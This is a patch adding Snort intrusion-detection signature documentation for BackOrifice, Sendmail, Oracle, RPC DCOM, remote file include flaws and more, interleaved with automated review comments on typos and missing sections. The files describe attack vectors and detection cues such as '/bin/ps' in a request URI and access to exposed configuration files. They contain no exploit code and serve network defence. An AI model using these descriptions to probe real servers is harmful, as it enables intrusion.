+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
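Review bot: the third paragraph of Detailed Information (`... validating the credentials of a client host connecting to the services offered on a host server ...`) is authentication-bypass boilerplate and does not describe the remote file include via the `language` parameter of `settings.html`; the same applies to the Attack Scenarios text about supplying `his/her own credentials`. Replace both with the remote file include scenario the Summary gives. Also: two blank lines precede `Rule:`, the separators after `100000853`, after the Affected Systems entry and after Contributors lack the blank line used elsewhere, `running ona web server` should be `on a web server`, `an exploitation attempt has been attempted` is redundant, and Additional References is empty.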
--- /dev/null
+++ b/doc/signatures/112.txt
@@ -0,0 +1,104 @@
+Rule:
+Backdoor.BackOrifice
+
+--
+Sid:
+112, 116
+
+--
+Summary:
+Backdoor.BackOrifice is a Trojan Horse.
+
+Server Port: 31337 although in later versions this port can be changed
+to a value between 1 and 65535
+Protocol: UDP although in later versions TCP can also be used
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to. This Trojan
+also has the ability to delete data, steal passwords and disable the
+machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+
+The Trojan changes system registry settings to add the BackOrifice sever
+to programs normally started on boot. Due to the nature of this Trojan
+it is unlikely that the attacker's client IP address has been spoofed.
+
+The default name of the server application is UMGR32, which can be
+changed on first use. The new application may be installed in the system
+or system32 direcory and the original may also be deleted.
+
+Event messages relating to activity from this Trojan are:
+
+	SID	Message
+	---	-------
+	112	BackOrifice access (outgoing TCP connection)
+	116	BackOrifice access (incoming UDP connection)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
+
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
+
+Registry keys added may vary, look for spurious entries in the above
+locations.
+
+BackOrifice may hide the process from viewing inthe Windows task
+manager. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS399
+
+Symantec Security Response
+http://www.symantec.com/avcenter/venc/data/back.orifice2000.trojan.html
+
+--
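Review bot: the Affected Systems section used by every other signature doc is missing; the operating system list under Detailed Information belongs there. Under Corrective Action the three registry keys are indented inconsistently (only `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services` is tab-indented) and the `...\CurrentVersion\Run\` entry has a trailing backslash the other two lack. Typos: `BackOrifice sever` should be `server`, `direcory` should be `directory`, `inthe` should be `in the`. `None Known` under False Positives and False Negatives has no terminating period, unlike the other docs.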
--- /dev/null
+++ b/doc/signatures/2284.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2284
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application MediaWiki running on a server.
+
+--
+Impact:
+Possible execution of arbitrary code and unauthorized administrative
+access to the target system.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application MediaWiki . This application
+does not perform stringent checks when handling user input, this may 
+lead to the attacker being able to execute PHP code and include php files 
+of the attackers choosing.
+
+--
+Affected Systems:
+	MediaWiki MediaWiki-stable 20031107
+	MediaWiki MediaWiki-stable 20030829
+
+--
+Attack Scenarios:
+An attacker can exploit weaknesses to gain access as the administrator 
+by supplying input of their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
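Review bot: Detailed Information has a stray space before the period in `MediaWiki .`, and `php files` should match the `PHP` capitalisation used in the same sentence. Affected Systems names two specific builds (`MediaWiki-stable 20031107` and `20030829`) but Additional References is empty; add the advisory or changelog entry those versions come from. Unlike the other web-application docs in this patch, neither the Summary nor Detailed Information says which request the rule matches (script name or parameter).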
--- /dev/null
+++ b/doc/signatures/2138.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+2138
+
+--
+Summary:
+This event is generated when an attempt is made to access a configuration file for the php application Web-ERP. 
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access a configuration file for the php application Web-ERP.
+
+Versions of the web based accounting system Web-ERP do not sufficiently protect the application configuration files. This could lead to sensitive information being disclosed to an unauthorized user.
+
+This rule generates an event if a request is made for the configuration file "logicworks.ini".
+
+--
+Affected Systems:
+Web-ERP Web-ERP 0.1.4
+
+--
+Attack Scenarios:
+An attacker can gain access to the application configuration by making a simple web request. The attacker might then use the information in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+The event will also be generated if Nessus is used to scan the host for this vulnerability.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
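Review bot: Affected Systems reads `Web-ERP Web-ERP 0.1.4`, the vendor name repeated as the product name; `Web-ERP 0.1.4` is what is meant. Additional References is empty and holds two stray blank lines; a vendor advisory or Bugtraq entry for the `logicworks.ini` exposure would support the Detailed Information text. Minor: `php application` should be `PHP application`, as in the other docs.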
--- /dev/null
+++ b/doc/signatures/1621.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid: 
+1621
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or it could be an attempt to compromise the FTP server by overflowing a buffer in the FTP daemon or service.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
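Review bot: neither the Summary (`activity relating to spurious ftp traffic`) nor Detailed Information says what the rule actually matches (a command, a filename, an argument length), so the reader cannot judge the event or tune it; 1844.txt in this same patch shows the level of detail needed. The Affected Systems section is missing, `Sid: ` carries trailing whitespace, `ftp` in the Summary should be `FTP` for consistency with the rest of the file, and `None Known` lacks the terminating period used elsewhere. In Corrective Action, `Use secure shell (ssh) to transfer files` would be more precise as `scp` or `sftp`.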
--- /dev/null
+++ b/doc/signatures/950.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+950
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
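Review bot: Detailed Information says only that `Many known vulnerabilities exist for this platform and the attack scenarios are legion`, which does not tell the reader what the rule matches (which FrontPage Server Extensions component or request URI); name it, as the other docs do. Additional References is empty; at least one advisory for the issue the rule covers would support the `Many exploits exist` statement under Ease of Attack.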
--- /dev/null
+++ b/doc/signatures/2270.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2270
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in versions of Sendmail.
+
+--
+Impact:
+Remote arbitrary code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the prescan() function used in Sendmail prior
+to version 8.12.9. This function contains an error when converting a
+character to an integer value while processing SMTP headers.
+
+--
+Affected Systems:
+All systems using Sendmail.
+
+--
+Attack Scenarios:
+An attacker could exploit this condition to process code of their
+choosing and open a listening shell bound to a high port, thus opening the
+system to further compromise.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade Sendmail to the latest non-affected verison.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-12.html
+
+--
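Review bot: Affected Systems (`All systems using Sendmail.`) contradicts Detailed Information, which scopes the prescan() bug to Sendmail prior to version 8.12.9; narrow Affected Systems to the vulnerable versions and state the fixed version (`8.12.9 or later`) in Corrective Action, since the document already gives that number. Typo in Corrective Action: `verison` should be `version`. `Rule:  ` and the `-- ` separator before Additional References carry trailing whitespace.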
--- /dev/null
+++ b/doc/signatures/3062.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+3062
+
+--
+Summary:
+This event is generated when an attempt is made to access the
+delhomepage.cgi script which contains known vulnerabilities and
+is resident on Netscreen SA 5000 devices.
+
+--
+Impact:
+Information gathering and possible cross site scripting attack.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to access the
+delhomepage.cgi script which is known to be vulnerable to a cross site
+scripting attack
+
+--
+Affected Systems:
+	Netscreen SA 5000
+
+--
+Attack Scenarios:
+An attacker can supply code of their choosing to a client system by
+using the cgi script as part of a cross site scripting attack.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
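Review bot: the Detailed Information paragraph ends without a period (`... a cross site scripting attack`) and repeats the Summary almost verbatim instead of adding what the rule matches (the bare `delhomepage.cgi` request, or a particular parameter). Corrective Action is the generic `up to date version` text; for a cross site scripting issue on an appliance, pointing at the vendor fix or restricting access to the administrative interface would be more specific. Additional References is empty; add the advisory for the Netscreen SA 5000 issue.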
--- /dev/null
+++ b/doc/signatures/1329.txt
@@ -0,0 +1,77 @@
+Rule:
+
+--
+Sid:
+1329
+
+--
+Summary:
+This event is generated when an attempt is made to access the ps command
+via the web
+
+--
+Impact:
+Attempt to gain information on system processes on webserver
+
+--
+Detailed Information:
+This is an attempt to gain intelligence on the processes being run on a
+webserver. The ps command lists the process status of running processes
+on a UNIX or Linux based system. The attacker could possibly gain
+information needed for other attacks on the system.
+
+Using "ps", the attackers would check for various running system
+services to exploit or for the presence of security software, such as
+host IDS or monitoring scripts. This rule looks for the "ps" command in
+the URI part of the client to web server connection and does not
+indicate whether the command was actually successful in displaying the
+list of processes. The presence of the "ps" command in the URI indicates
+that an attacker attempted to trick the web server into executing system
+commands in non-interactive mode i.e. without a valid shell session.
+
+Alternatively this rule may trigger in an unencrypted HTTP tunneling
+connection to the server or a shell connection via another exploit
+against the web server.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains '/bin/ps'in
+the URI.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside of it's designated web root or cgi-bin. This command may also be
+requested on a command line should the attacker gain access to the
+machine. On BSD derived systems, setting the parameter
+"kern.ps_showallprocs" to zero will show only the processes being run by
+that user except for root who will still see all processes.
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Additional information from Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+sid: 1328
+
+Manual page for ps.
+
+http://linux.about.com/library/cmd/blcmdl1_ps.htm
+
+--
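Review bot: `it's designated web root` should be `its`, and `'/bin/ps'in the URI` lacks a space before `in`. The Summary and Impact lines have no terminating period, unlike the rest of the file, and `None Known` under False Positives and False Negatives has none either. The Affected Systems section is missing; Detailed Information implies UNIX or Linux web servers. The cross-reference `sid: 1328` under Additional References would be clearer as a sentence (`See also sid 1328.`) than as a bare key. The first Corrective Action sentence would read better as `Web servers should not be allowed to view or execute files and binaries outside their designated web root or cgi-bin.`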
--- /dev/null
+++ b/doc/signatures/1844.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+1844
+
+--
+Summary:
+This event is generated when a remote attacker sends an overly long
+argument in the AUTHENTICATE command to an internal IMAP server,
+indicating an attempt to exploit a buffer overflow vulnerability in
+Netscape Messaging Server and University of Washington IMAP
+implementations. This may also affect other IMAP server implementations.
+
+--
+Impact:
+Remote execution of arbitrary code with the security privileges of the
+IMAP process, possibly leading to remote root compromise.
+
+--
+Detailed Information:
+A buffer overflow vulnerability exists in the AUTHENTICATE command in
+University of Washington IMAP and Netscape Messaging Server. This can
+allow a remote attacker to send an AUTHENTICATE command with a
+malformed, overlong argument to a vulnerable IMAP server, causing a
+buffer overflow condition. The attacker can then execute arbitrary code
+on the server with the security privileges of the IMAP server process. 
+
+--
+Affected Systems:
+	Netscape Messaging Server 3.55 and earlier
+	University of Washington imapd 10.234 and earlier.
+
+--
+Attack Scenarios:
+An attacker sends an overly long, malformed argument to an AUTHENTICATE
+command to a vulnerable IMAP server, causing a buffer overflow
+condition. The attacker is then able to execute arbitrary code on the
+server with the security privileges of the IMAP server process.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Patches have been released for both UW IMAP and Netscape Messaging
+Server. Apply the patch or upgrade to a Netscape Messaging Server
+version higher than 3.55 or UW IMAP version higher than 10.234.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/130
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0005
+
+--
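Review bot: the Affected Systems entries are punctuated inconsistently (`Netscape Messaging Server 3.55 and earlier` has no period, the imapd line does), and the line ending `security privileges of the IMAP server process. ` has trailing whitespace. Otherwise this doc is the model the others in this patch should follow: it names the command, the affected versions and the fixed versions, and gives Bugtraq and CVE references.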
--- /dev/null
+++ b/doc/signatures/2903.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2903
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create_snapshot_repgroup
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
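Review bot: the "Rule:" and "Additional References:" sections of this file are empty, so the document never identifies what the signature matches or points at a vendor advisory for a vulnerability it calls "known". In Detailed Information the procedure sentence is split by a stray line break ("vulnerability in the procedure create_snapshot_repgroup" / ". This procedure is included in" / "sys.dbms_repcat_sna."), which looks like a newline inserted by template substitution; suggest joining it into one sentence and adding the advisory reference.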
--- /dev/null
+++ b/doc/signatures/931.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+931
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
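Review bot: the product name is spelled "ColdFusion" in Summary and Affected Systems but "Coldfusion" in Detailed Information; pick one. The file promises a "known vulnerability" while both "Rule:" and "Additional References:" are empty, so nothing tells the reader which of the "legion" vulnerabilities this sid covers; either name it or state explicitly that this is a generic ColdFusion detection. Also "attackers choosing" should be "attacker's choosing".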
--- /dev/null
+++ b/doc/signatures/500.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+500
+--
+Summary:
+This event is generated when an IPv4 packet has the loose source record 
+route IP option set.
+--
+Impact:
+Information could be gathered about network topology, and machines 
+routing packets onto trusted links could be abused.
+--
+Detailed Information:
+Loose source record routing specifies a series of machines which must be
+used in the routing of a datagram.  This can be useful to map out routes
+using the traceroute program by adding discovered intermediary routers 
+one at a time.  Furthermore, while a machine may normally be unreachable
+due to default gateways, a compliant router can be forced to hand off 
+source routed packets to an intermediary capable of speaking both to the
+outside world and target machines; the packet may then be forwarded on
+to its destination.
+--
+Affected Systems:
+Any machine fully implementing RFC 791 set up as a router.
+--
+Attack Scenarios:
+By incrementing the TTL of successive packets, the topology of routes to
+a host can be determined.  Each compliant node along the way will reply
+with an ICMP Time Exceeded bearing their address and the recorded route.
+--
+Ease of Attack:
+Tools are readily available to employ source routing for the purpose of
+network discovery; the bounce attack described is unlikely to surface in
+a properly configured network.
+--
+False Positives:
+None known.
+--
+False Negatives:
+Network discovery can be done using other means than source routing.
+--
+Corrective Action:
+Redesign network topologies so that routers are kept to a minimum;
+disable routing by other machines.  To prevent network mapping, don't
+allow source-routed packets at all. 
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nick Black, Reflex Security <dank@reflexsecurity.com>
+-- 
+Additional References:
+
+IP RFC:
+http://www.faqs.org/rfcs/rfc791.html
+
+--
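Review bot: the False Negatives entry ("Network discovery can be done using other means than source routing.") describes other reconnaissance techniques rather than cases where this rule fails to match an LSRR packet, which is what the section is for; suggest "None known." or a statement of what the rule does not match. Minor: RFC 791 names the option "Loose Source and Record Route" rather than "loose source record route", and "bearing their address" in Attack Scenarios should agree with "Each compliant node" ("its address"). This file also omits the blank line between sections that the other files use.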
--- /dev/null
+++ b/doc/signatures/311.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid: 311
+
+--
+Summary:
+Versions of the Netscape browser including and prior to 4.75 are vulnerable to a buffer overflow that may lead to arbitrary code execution on the victim host. It is also possible to open a root shell listening on a high port on the victim host. This event is generated when a request is made to a web site exploiting this vulnerability.
+
+--
+Impact:
+System compromize presenting the attacker with the opportunity to
+execute arbitrary code on the victim host.
+
+--
+Detailed Information:
+A buffer overflow condition exists in the HTML parser on some versions of Netscape Navigator. It is possible for a remote attacker to execute arbitrary code on the victim host.
+
+It is possible to crash Netscape Communicator if a large number of characters is supplied in a command from an interactive web page.
+
+Affected Systems:
+	Netscape Navigator 4.75 and prior
+
+--
+Attack Scenarios:
+The attacker would need to supply a link on a web page or HTML email that triggers the overflow. It is also possible to cause the overflow via HTML email.
+
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-1187
+
+Bugtraq:
+http://www.securityfocus.com/bid/822
+
+--
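Review bot: the "--" separator is missing between the end of Detailed Information ("It is possible to crash Netscape Communicator ...") and "Affected Systems:", so any parser that splits sections on the separator will fold Affected Systems into the previous section; add the separator. Also "System compromize" in Impact should be "System compromise", and Attack Scenarios mentions HTML email twice in consecutive sentences.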
--- /dev/null
+++ b/doc/signatures/2683.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2683
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure sdo_code_size
+. This procedure is included in
+mdsys.md2.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
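Review bot: same template fault as the other Oracle procedure files: the procedure sentence is broken across lines ("vulnerability in the procedure sdo_code_size" / ". This procedure is included in" / "mdsys.md2."), and both "Rule:" and "Additional References:" are empty for what the text calls a known vulnerability. Suggest joining the sentence into one line and adding the vendor advisory reference.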
--- /dev/null
+++ b/doc/signatures/1240.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid: 1240
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability in Marty Bochane MDBMS relational database system.
+
+--
+Impact:
+Serious. Execution of arbitrary code on the target server is possible.
+
+--
+Detailed Information:
+MDBMS is a relational databse system for UNIX style platforms. Certain
+versions of the software contain a vulnerability that can allow
+execution of arbitrary code on the server with the privileges of the
+user running MDBMS.
+
+--
+Affected Systems:
+	MDBMS 0.99b9 and prior
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
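Review bot: "relational databse system" should be "relational database system", and "Marty Bochane MDBMS" is missing the possessive ("Marty Bochane's MDBMS"). The Attack Scenarios section says only "Exploit scripts are available", which is an ease-of-attack statement already made in the next section rather than a description of how the vulnerability is reached; suggest stating the vector, and filling the empty Additional References with the advisory that the "0.99b9 and prior" version range comes from.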
--- /dev/null
+++ b/doc/signatures/3218.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3218
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
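Review bot: "Expoit code exists" in Ease of Attack should be "Exploit code exists". Detailed Information describes "malformed data via RPC" sent to "an RPC port", while Attack Scenarios describes "a request for a file with an overly long filename via a network share"; the two should be reconciled or the link between them explained so the reader knows what traffic the rule is looking for. Additional References is empty although the Summary calls this a known vulnerability in Microsoft RPC DCOM; the Microsoft bulletin belongs there so the "Apply the appropriate vendor supplied patches" advice is actionable.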
--- /dev/null
+++ b/doc/signatures/100000571.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000571
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "app_mod_rewrite.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"app_mod_rewrite.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
